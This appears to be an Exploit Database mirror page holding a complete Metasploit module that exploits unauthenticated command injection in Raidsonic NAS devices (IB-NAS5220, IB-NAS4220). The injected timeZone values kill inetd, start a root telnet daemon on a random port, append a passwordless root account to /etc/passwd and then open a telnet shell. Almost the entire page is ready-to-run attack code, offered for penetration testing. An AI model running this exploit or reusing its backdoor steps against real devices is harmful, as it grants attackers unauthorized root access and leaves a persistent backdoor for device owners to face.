Raidsonic NAS Devices – Remote Command Execution (Metasploit)

• Exploit Database
• 114 阅读

• 作者： Metasploit
  日期： 2013-09-24
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/28508/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206

  ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # It&apos;s backdooring the remote device   include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::CommandShell include Msf::Exploit::FileDropper   RESPONSE_PATTERN = "\<FORM\ NAME\=\"form\"\ METHOD\=\"POST\"\ ACTION\=\"\/cgi\/time\/time.cgi\"\ ENCTYPE\=\"multipart\/form-data"   def initialize(info = {}) super(update_info(info, &apos;Name&apos;=> &apos;Raidsonic NAS Devices Unauthenticated Remote Command Execution&apos;, &apos;Description&apos; => %q{ Different Raidsonic NAS devices are vulnerable to OS command injection via the web interface. The vulnerability exists in timeHandler.cgi, which is accessible without authentication. This module has been tested with the versions IB-NAS5220 and IB-NAS4220. Since this module is adding a new user and modifying the inetd daemon configuration, this module is set to ManualRanking and could cause target instability. }, &apos;Author&apos;=> [ &apos;Michael Messner <devnull@s3cur1ty.de>&apos;, # Vulnerability discovery and Metasploit module &apos;juan vazquez&apos; # minor help with msf module ], &apos;License&apos; => MSF_LICENSE, &apos;References&apos;=> [ [ &apos;OSVDB&apos;, &apos;90221&apos; ], [ &apos;EDB&apos;, &apos;24499&apos; ], [ &apos;BID&apos;, &apos;57958&apos; ], [ &apos;URL&apos;, &apos;http://www.s3cur1ty.de/m1adv2013-010&apos; ] ], &apos;DisclosureDate&apos; => &apos;Feb 04 2013&apos;, &apos;Privileged&apos; => true, &apos;Platform&apos; => &apos;unix&apos;, &apos;Payload&apos; => { &apos;Compat&apos;=> { &apos;PayloadType&apos;=> &apos;cmd_interact&apos;, &apos;ConnectionType&apos; => &apos;find&apos;, }, }, &apos;DefaultOptions&apos; => { &apos;PAYLOAD&apos; => &apos;cmd/unix/interact&apos; }, &apos;Targets&apos;=> [ [ &apos;Automatic&apos;, { } ], ], &apos;DefaultTarget&apos;=> 0 ))   register_advanced_options( [ OptInt.new(&apos;TelnetTimeout&apos;, [ true, &apos;The number of seconds to wait for a reply from a Telnet command&apos;, 10]), OptInt.new(&apos;TelnetBannerTimeout&apos;, [ true, &apos;The number of seconds to wait for the initial banner&apos;, 25]) ], self.class) end   def tel_timeout (datastore[&apos;TelnetTimeout&apos;] || 10).to_i end   def banner_timeout (datastore[&apos;TelnetBannerTimeout&apos;] || 25).to_i end   def exploit telnet_port = rand(32767) + 32768   print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}")   #first request cmd = "killall inetd" cmd = Rex::Text.uri_encode(cmd) print_status("#{rhost}:#{rport} - sending first request - killing inetd")   res = request(cmd) #no server header or something that we could use to get sure the command is executed if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end   #second request inetd_cfg = rand_text_alpha(8) cmd = "echo \"#{telnet_port} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) print_status("#{rhost}:#{rport} - sending second request - configure inetd")   res = request(cmd) #no server header or something that we could use to get sure the command is executed if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end register_file_for_cleanup("/tmp/#{inetd_cfg}")   #third request cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd")   res = request(cmd) #no server header or something that we could use to get sure the command is executed if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end   #fourth request @user = rand_text_alpha(6) cmd = "echo \"#{@user}::0:0:/:/bin/ash\" >> /etc/passwd" cmd = Rex::Text.uri_encode(cmd) print_status("#{rhost}:#{rport} - sending fourth request - configure user #{@user}")   res = request(cmd) #no server header or something that we could use to get sure the command is executed if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end   print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") ctx = { &apos;Msf&apos; => framework, &apos;MsfExploit&apos; => self } sock = Rex::Socket.create_tcp({ &apos;PeerHost&apos; => rhost, &apos;PeerPort&apos; => telnet_port.to_i, &apos;Context&apos; => ctx })   if sock.nil? fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end   add_socket(sock)   print_status("#{rhost}:#{rport} - Trying to establish a telnet session...") prompt = negotiate_telnet(sock) if prompt.nil? sock.close fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session") else print_good("#{rhost}:#{rport} - Telnet session successfully established...") end   handler(sock)   end   def request(cmd)   uri = &apos;/cgi/time/timeHandler.cgi&apos;   begin res = send_request_cgi({ &apos;uri&apos;=> uri, &apos;method&apos; => &apos;POST&apos;, #not working without setting encode_params to false! &apos;encode_params&apos; => false, &apos;vars_post&apos; => { "month"=> "#{rand(12)}", "date" => "#{rand(30)}", "year" => "20#{rand(99)}", "hour" => "#{rand(12)}", "minute" => "#{rand(60)}", "ampm" => "PM", "timeZone" => "Amsterdam<code>#{cmd}</code>", "ntp_type" => "default", "ntpServer"=> "none", "old_date" => " 1 12007", "old_time" => "1210", "old_timeZone" => "Amsterdam", "renew"=> "0" } }) return res rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") end end   def negotiate_telnet(sock) login = read_telnet(sock, "login: $") if login sock.put("#{@user}\r\n") end return read_telnet(sock, "> $") end   def read_telnet(sock, pattern) begin Timeout.timeout(banner_timeout) do while(true) data = sock.get_once(-1, tel_timeout) return nil if not data or data.length == 0 if data =~ /#{pattern}/ return true end end end rescue ::Timeout::Error return nil end end end